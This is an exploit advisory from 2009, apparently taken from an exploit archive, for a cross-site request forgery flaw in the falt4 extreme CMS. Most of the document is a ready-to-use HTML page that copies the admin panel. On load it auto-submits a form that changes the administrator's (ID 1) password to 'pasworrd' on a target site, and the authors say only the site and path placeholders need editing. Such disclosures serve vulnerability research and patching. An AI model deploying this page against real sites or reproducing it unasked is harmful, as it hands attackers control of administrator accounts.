falt4-cms-xsrf.txt

Posted on 15 February 2009

#######################################
#
#falt4 extreme (RC4,10.9.2007) cms cross site request forgery
########################################
#
#Authors:d14l and marcoj
#######################################
#
#cms homepage:www.falt4.org
#######################################
#greetz:soul,stefo,sp1r1t,stexor,stronix,invisible,kisobran,csi and others
#
########################################

falt4 cms suffers from csrf vulnerability which allows attacket to change victim's password



you need only edit [site] and [path] in code and when victim click on it it will change its password to "pasworrd"

id of admin is "1"

######################################################CODE##########################################################
</head>

<body>


<body onload="javascript:senden()">
<div id='content_container'>
<table width='1000' align='center' cellpadding='0' cellspacing='0' border='0' bgcolor='white'>
<!-- header -->
<tr>
<td height='54'>
<div id="helpbutton"><a href='javascript:helpflap();'><img src='gfx/themes/default_blue//help.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></div>

<div id='helptext'></div>

<div class='logo' align="left" style='padding:0px;z-index:5;position:relative;'>
<table width='100%' cellpadding='15' cellpadding="5">
<tr>
<td width='50%' align='left'>
<img src='gfx/themes/default_blue/banners/banner.jpg' alt='faltsystem' />						<div style='position:absolute;top:65px;margin-left:70px;' id='quotes'></div>
</td>
<td width='50%' align='right'  style='position:relative;z-index:6;'>

<div style='position:relative;z-index:0;'>
<table>
<tr>
<td valign='middle'>
<img src='gfx/themes/default_blue/quickfind.gif' alt='' />
</td>
<td valign="middle">
<input input type="text" class="inputfield" class="inputfield" name="query" id="query" onKeyup="sendit();">
</td>

</tr>
</table>
</div>



<!-- SPOTLIGHT HERE -->
</td>
</tr>
</table>


</div>
</td>
</tr>
<!-- banner -->
<!-- nav -->
<tr>
<td>
<table width='100%' cellpadding='0' cellspacing='0' border='0'>
<tr>

<td height='23' width="100%" style="position:relative;z-index:9;" align="right">
<div id="menu">
<ul id="nav">

<li><a class='nav_inactive' href="index.php?handler=start"><img src='gfx/themes/default_blue/menu_icons/application_home.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Start</a></li>


<!-- ARTIKEL -->
<li><a class='nav_inactive' href="index.php?handler=edit_content&action=list_articles"><img src='gfx/themes/default_blue/menu_icons/icon_article.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Article</a></li>
<!-- MEDIADB -->
<li><a class='nav_inactive' href="index.php?handler=mediadb25"><img src='gfx/themes/default_blue/menu_icons/mdb-mini.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Media DB</a></li>

<!-- SEITENSTRUKTUR -->

<li><a class='nav_inactive' href="index.php?handler=edit_site_structure"><img src='gfx/themes/default_blue/menu_icons/treeview.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Structure</a></li>


<!-- KATEGORIEN -->


<li><a class='nav_inactive' href="index.php?handler=edit_categories&action=default"><img src='gfx/themes/default_blue/menu_icons/minicategorie_normal.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Categories        </a>
</li>


<!-- NAVIGATION -->
<li><a class='nav_inactive' href='index.php?handler=edit_navigation&action=default'><img src='gfx/themes/default_blue/menu_icons/navigation.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Navigation</a></li>

<!-- MODULE -->

<li><a class='nav_inactive' href='index.php?handler=edit_modules&action=default'><img src='gfx/themes/default_blue/menu_icons/icon_module.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Module</a></li>




<li><a class='nav_active' href='index.php?handler=edit_properties&action=default'><img src='gfx/themes/default_blue/menu_icons/site_properties.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Administration</a>
</li>
<li><a class='nav_inactive' href='index.php?handler=show_statistics&action=default'><img src='gfx/themes/default_blue/menu_icons/statistics.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;Statistics</a></li>

</ul>


</div>
</td>
</tr>
</table>
</td>
</tr>

<!--engine-->

<tr>
<td class='border_top' height='440' bgcolor='white' valign='top'>
<table width='100%' cellpadding='0' cellspacing='0' border='0'>
<tr>
<td width='160' valign='top'>
<!-- aktionen -->
<table width='160' cellpadding='0' cellspacing='0' border='0'>
<!--spacer ueber aktionen -->
<tr>

<td width='160' height='5' valign="top">
</td>
</tr>
<tr>
<td width='160' height='272' valign="top">
<table width='160' class='nav_left' style='border-spacing: 0px 8px;'>		<tr>
<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=default'><img src='gfx/themes/default_blue/menu_icons/list.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=default'>Listview</a></td>		</tr>		<tr>

<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=add_choose'><img src='gfx/themes/default_blue/menu_icons/user_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=add_choose'>Add User</a></td>		</tr>		<tr>
<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=addgroup_choose'><img src='gfx/themes/default_blue/menu_icons/group_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=addgroup_choose'>Add Group</a></td>		</tr><tr><td colspan='2' class='nav_no'>&nbsp;</td></tr>		<tr>
<td valign='middle' width='32' height='25' class='action_group' align='right'><img src='gfx/themes/default_blue/menu_icons/icon_action.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</td>
<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><b> Process</b></td>		</tr>		<tr>

<td valign='top' width='32' height='15' align='right'><a onClick='javascript:senden()'><img src='gfx/themes/default_blue/menu_icons/save.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:senden()'> Save</a></td>		</tr>		<tr>
<td valign='top' width='32' height='15' align='right'><a onClick='javascript:history.back()'><img src='gfx/themes/default_blue/menu_icons/back.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);"   />&nbsp;</a></td>
<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:history.back()'> Back</a></td>		</tr></table>
</td>

</tr>
<tr>
<td width='160' height='172' valign="bottom">
<table width='160' cellpadding='0' cellspacing='0' border='0'>
<tr>
<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><img src='gfx/themes/default_blue/spacer1x1.gif' width='16' height='16' alt='&gt;' /><strong>Logged in as&nbsp; </strong></td>
</td>
</tr>

<tr><td>
<p style="padding-top:8px;">&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/logout.png' alt='&gt;' />&nbsp;<a href='index.php?submit=logout' style='color:#FF6600; font-weight:normal;'><strong>[Logout]</strong></a><p/>
<p>&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/site_properties.png' alt='&gt;' />&nbsp;<a href="index.php?handler=dummy">My Profile</a></p>
<p>&nbsp;&nbsp;<select name='backlang'  onchange="window.location='http://[site]/[path]/admin/index.php?handler=manage_users&action=edit&ID=1&backlang='+this.options [this.selectedIndex].value"><option value='de' >de</option><option value='En'  selected>En</option><option value='es' >es</option><option value='fr' >fr</option><option value='it' >it</option><option value='leet' >leet</option></select></p>		<script language="JavaScript">
function reload_theme()
{
var url = String(window.location);
var url = url.replace(/#/g,"");
alert(url);
}
</script>

<p>&nbsp;&nbsp;<select name='backtheme' onchange="window.location='index.php?handler=manage_users&action=edit&ID=1&back_theme='+this.options [this.selectedIndex].value"><option value='default'  selected>default</option><option value='default_blue'  selected>default_blue</option></select></p>											</td></tr>

</table>
</td>
</tr>
</table>
</td>
<td bgcolor="#e3e3e4" height='440'>
<!-- enginebox -->
<table width='100%' cellpadding='0' cellspacing='0' border='0'>
<tr>

<td width='20' height='40' valign="top">
</td>
<td>
<div style="position:relative; top:0px; right:13px; text-align:right; font-size:16px; font-weight:bold; color:#999999;z-index:2;"></div>
</td>
</tr>
<tr>
<td width='20' height='40' valign="top">
</td>

<td valign='top' height='900' style="position:relative;z-index:2;">


<div id="response_div" name="response_div"></div>

<script language="JavaScript" type="text/javascript">
function senden()
{
var check = chkFormular();
if(check!=false)
{
document.formular.submit();
}
}
function chkFormular()
{


if(document.formular.password.value=="")
{
alert('Enter a user password');
document.formular.password.focus();
return false;
}


}
</script>
<form action="http://[site]/[path]/admin/index.php?handler=manage_users&action=edit_now" name="formular" method="post"><table width='825' id='table_open_1'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Account information</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="title"><td colspan='2'>User properties from<i>   </i>change</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Name:</b></td><td> </td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Password:</td><td><input input type="password" class="inputfield" class="inputfield" name="password" value="pasworrd"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Status:</td><td>Administrator</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>eMail:</td><td><input input type="text" class="inputfield" class="inputfield" name="email" value="ssssssssssssssss@net.hr"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>ICQ:</td><td><input input type="text" class="inputfield" class="inputfield" name="icq" value="0"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Picture:</td><td>	<script type="text/javascript">
function selectdiv()
{
if (document.getElementById)
{
var mydiv=document.getElementById('selectdiv');
mydiv.style.display = (mydiv.style.display=='block'?'none':'block');
}
}
</script>


<input type='hidden' size='30' name='kat_ID' id='kat_ID_hidden'><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' name='katname' id='katname' onclick='selectdiv(); this.blur();'></td><td><a onClick='selectdiv();'><img src='gfx/themes/default_blue/chooser.gif' style='cursor:pointer'></a></td></tr></table><div id='selectdiv' class='selectdiv' onClick='selectdiv();'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td width='19' valign='top' style='cursor:pointer;'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();">/ Root(0)</netcms><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();">business(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();">business.tar(0)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();">business.tar(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();">screenshots(8)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();">Templates(0)</a><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();">Falt4 Extreme(7)</a></td></tr></table></td></tr></table></td></tr>

</table></div>	<script type="text/javascript">

function selectmediadiv()
{
if (document.getElementById)
{
var mydiv=document.getElementById('selectmediadiv');
mydiv.style.display = (mydiv.style.display=='block'?'none':'block');
}
}
</script>
<input type='hidden' size='30' name='avatar' id='media_ID' value=''><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' value='' name='medianame' id='medianame' onClick='selectmediadiv(); this.blur();'></td><td style='cursor:pointer;'><a onClick='selectmediadiv();' style='cursor:pointer;'><img style='cursor:pointer;' src='gfx/themes/default_blue/chooser.gif'></a></td></tr></table><div id='selectmediadiv' class='selectdiv' onClick='selectmediadiv();'></div><table width='153'><script language='javascript'>
var mediadiv = document.getElementById('selectmediadiv');
function show_kat_1(){
mediadiv.innerHTML='';
check(); }
function show_kat_2(){
mediadiv.innerHTML='';
check(); }
function show_kat_3(){
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value ='apfel.jpg'; document.forms[0].media_ID.value = '1';"  width="153"><a onClick="document.forms[0].medianame.value ='apfel.jpg'; document.forms[0].media_ID.value ='1';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value ='apfel.jpg'; document.forms[0].media_ID.value ='1';" ><netcms class="mediafont">apfel.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='home.gif'; document.forms[0].media_ID.value = '2';"  width="153"><a onClick="document.forms[0].medianame.value ='home.gif'; document.forms[0].media_ID.value ='2';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='home.gif'; document.forms[0].media_ID.value ='2';" ><netcms class="mediafont">home.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='map'; document.forms[0].media_ID.value = '7';"  width="153"><a onClick="document.forms[0].medianame.value ='map'; document.forms[0].media_ID.value ='7';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='map'; document.forms[0].media_ID.value ='7';" ><netcms class="mediafont">map</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='modules.gif'; document.forms[0].media_ID.value = '3';"  width="153"><a onClick="document.forms[0].medianame.value ='modules.gif'; document.forms[0].media_ID.value ='3';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='modules.gif'; document.forms[0].media_ID.value ='3';" ><netcms class="mediafont">modules.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='pictures.gif'; document.forms[0].media_ID.value = '4';"  width="153"><a onClick="document.forms[0].medianame.value ='pictures.gif'; document.forms[0].media_ID.value ='4';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='pictures.gif'; document.forms[0].media_ID.value ='4';" ><netcms class="mediafont">pictures.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='speedmap.gif'; document.forms[0].media_ID.value = '5';"  width="153"><a onClick="document.forms[0].medianame.value ='speedmap.gif'; document.forms[0].media_ID.value ='5';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='speedmap.gif'; document.forms[0].media_ID.value ='5';" ><netcms class="mediafont">speedmap.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='treasuremap.gif'; document.forms[0].media_ID.value = '6';"  width="153"><a onClick="document.forms[0].medianame.value ='treasuremap.gif'; document.forms[0].media_ID.value ='6';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value ='treasuremap.gif'; document.forms[0].media_ID.value ='6';" ><netcms class="mediafont">treasuremap.gif</netcms></a><br/></td></tr>';
check(); }
function show_kat_4(){
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value ='Administrators Place'; document.forms[0].media_ID.value = '14';"  width="153"><a onClick="document.forms[0].medianame.value ='Administrators Place'; document.forms[0].media_ID.value ='14';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Administrators Place'; document.forms[0].media_ID.value ='14';" ><netcms class="mediafont">Administrators Place</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Article properties'; document.forms[0].media_ID.value = '10';"  width="153"><a onClick="document.forms[0].medianame.value ='Article properties'; document.forms[0].media_ID.value ='10';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Article properties'; document.forms[0].media_ID.value ='10';" ><netcms class="mediafont">Article properties</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Article editing'; document.forms[0].media_ID.value = '11';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Article editing'; document.forms[0].media_ID.value ='11';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Article editing'; document.forms[0].media_ID.value ='11';" ><netcms class="mediafont">Falt4 Article editing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Article listing'; document.forms[0].media_ID.value = '9';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Article listing'; document.forms[0].media_ID.value ='9';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Article listing'; document.forms[0].media_ID.value ='9';" ><netcms class="mediafont">Falt4 Article listing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Media Database'; document.forms[0].media_ID.value = '12';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Media Database'; document.forms[0].media_ID.value ='12';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Media Database'; document.forms[0].media_ID.value ='12';" ><netcms class="mediafont">Falt4 Media Database</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Navigation Administration'; document.forms[0].media_ID.value = '1';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Navigation Administration'; document.forms[0].media_ID.value ='1';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Navigation Administration'; document.forms[0].media_ID.value ='1';" ><netcms class="mediafont">Falt4 Navigation Administration</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Template editor'; document.forms[0].media_ID.value = '15';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Template editor'; document.forms[0].media_ID.value ='15';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Template editor'; document.forms[0].media_ID.value ='15';" ><netcms class="mediafont">Falt4 Template editor</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='Falt4 Welcome Screen'; document.forms[0].media_ID.value = '8';"  width="153"><a onClick="document.forms[0].medianame.value ='Falt4 Welcome Screen'; document.forms[0].media_ID.value ='8';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value ='Falt4 Welcome Screen'; document.forms[0].media_ID.value ='8';" ><netcms class="mediafont">Falt4 Welcome Screen</netcms></a><br/></td></tr>';
check(); }
function show_kat_5(){
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value ='1.jpg'; document.forms[0].media_ID.value = '16';"  width="153"><a onClick="document.forms[0].medianame.value ='1.jpg'; document.forms[0].media_ID.value ='16';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value ='1.jpg'; document.forms[0].media_ID.value ='16';" ><netcms class="mediafont">1.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='2.jpg'; document.forms[0].media_ID.value = '17';"  width="153"><a onClick="document.forms[0].medianame.value ='2.jpg'; document.forms[0].media_ID.value ='17';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value ='2.jpg'; document.forms[0].media_ID.value ='17';" ><netcms class="mediafont">2.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='3.jpg'; document.forms[0].media_ID.value = '18';"  width="153"><a onClick="document.forms[0].medianame.value ='3.jpg'; document.forms[0].media_ID.value ='18';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value ='3.jpg'; document.forms[0].media_ID.value ='18';" ><netcms class="mediafont">3.jpg</netcms></a><br/></td></tr>';
check(); }
function show_kat_6(){
mediadiv.innerHTML='';
check(); }
function show_kat_7(){
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value ='16'; document.forms[0].media_ID.value = '20';"  width="153"><a onClick="document.forms[0].medianame.value ='16'; document.forms[0].media_ID.value ='20';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value ='16'; document.forms[0].media_ID.value ='20';" ><netcms class="mediafont">16</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='17'; document.forms[0].media_ID.value = '19';"  width="153"><a onClick="document.forms[0].medianame.value ='17'; document.forms[0].media_ID.value ='19';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value ='17'; document.forms[0].media_ID.value ='19';" ><netcms class="mediafont">17</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value ='18'; document.forms[0].media_ID.value = '21';"  width="153"><a onClick="document.forms[0].medianame.value ='18'; document.forms[0].media_ID.value ='21';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value ='18'; document.forms[0].media_ID.value ='21';" ><netcms class="mediafont">18</netcms></a><br/></td></tr>';
check(); }
function check(){
if(document.forms[0].kat_ID_hidden.value != ''){
document.forms[0].medianame.value = 'No Media Selected';
}}	if(document.forms[0].kat_ID.value == ''){
document.forms[0].kat_ID.value = ''; document.forms[0].katname.value = ''; show_kat_(); document.forms[0].medianame.value = ''; document.forms[0].media_ID.value = '';
}	if(document.forms[0].medianame.value == ''){
document.forms[0].medianame.value = 'No Media Selected';
}if(document.forms[0].katname.value == ''){document.forms[0].katname.value = 'No Kat Selected';}</script></table></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Signature:</td><td><input input type="text" class="inputfield" class="inputfield" name="signature" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>www:</td><td><input input type="text" class="inputfield" class="inputfield" name="www" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Default editor:</td><td><select name='editor'><option value="">-- Default --</option><option value='editor'>graphic editor (Word)</option><option value='html' >HTML editor</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Backend Language:</td><td><select name="backend_language"><option value="">-- Default --</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Sort by:</td><td><select name="sortfield"><option value="">-- Default --</option><option value="categorie">Category</option><option value="title">Title</option><option value="Datum">Date</option></select><select name="sort"><option value="">-- Default --</option><option value="desc">List descending(a-b-c)</option><option value="asc">List ascending (c-b-a)</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Genenral time information:</td><td><select name="timespan"><option value="">-- Default --</option><option value="1">1 Days</option><option value="2">2 Days</option><option value="3">3 Days</option><option value="4">4 Days</option><option value="5">5 Days</option><option value="6">6 Days</option><option value="7">7 Days</option><option value="8">8 Days</option><option value="9">9 Days</option><option value="10">10 Days</option><option value="11">11 Days</option><option value="12">12 Days</option><option value="13">13 Days</option><option value="14">14 Days</option><option value="15">15 Days</option><option value="16">16 Days</option><option value="17">17 Days</option><option value="18">18 Days</option><option value="19">19 Days</option><option value="20">20 Days</option><option value="21">21 Days</option><option value="22">22 Days</option><option value="23">23 Days</option><option value="24">24 Days</option><option value="25">25 Days</option><option value="26">26 Days</option><option value="27">27 Days</option><option value="28">28 Days</option><option value="29">29 Days</option><option value="30">30 Days</option><option value="31">31 Days</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Auto puplishing:</td><td><select name="publish_aut"><option value="1">Yes</option><option value="0"selected>No</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Messages recieved from CMS:</td><td><select name="send_mail"><option value="0" selected>No</option><option value="1" >Yes</option></select><select name="level"><option value="1" selected>1 | Only messages and duties</option><option value="2" >2 | Messages & duties & publishing requestions</option><option value="3" >3 | Article changes & duties & Messages & publishing requestions</option><option value="4" >4 | All</option></select></td></tr></table></td></tr></table><br /><br /><input type="hidden" name="ID" value="1"><table width='825' id='table_open_2'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Security Settings</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Secure Login:</td><td colspan='2'><input type='radio' name='restricted_login' value='1' >Yes<input type='radio' name='restricted_login' value='0' checked>No</td></tr></form><form action='index.php?handler=manage_users&action=change_ip' method='post'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>existing IP- Adressen:</td><td><select name='ip[]' size='5' multiple></select></td><td><input type='submit' name='bb' value='Drop selection' style='cursor:pointer;'></td></tr><input type='hidden' name='user_ID' value='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td> add new IP-adress:</td><td><input type='text' class='inputfield' name='new_ip'></td><td><input type='submit' name='bb' value='add' style='cursor:pointer;'></td></tr></form></table></td></tr></table><br /><br /><table width='825' id='table_open_3'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>&nbsp;</td></tr><tr><td class='white'><table cellpadding="0" cellspacing="0"><tr><td  style="cursor:pointer;" class="button_background" onclick="javascript:senden()"><font color="#FFFFFF" style='text-decoration:none;'>Save</font></td></tr></table><br /><table cellpadding="0" cellspacing="0"><tr><td  style="cursor:pointer;" class="button_background" onclick="javascript:history.back()"><font color="#FFFFFF" style='text-decoration:none;'>Back</font></td></tr></table><br /></td></tr></table><br /><br />


<br><br>

</td>
</tr>

</td>
</tr>
</table>
</td>
</tr>
</table>

</div>

</body>
</html>


###############################################################END############################################################
TOP
Malware :

Last 20
Exploits :

Last 20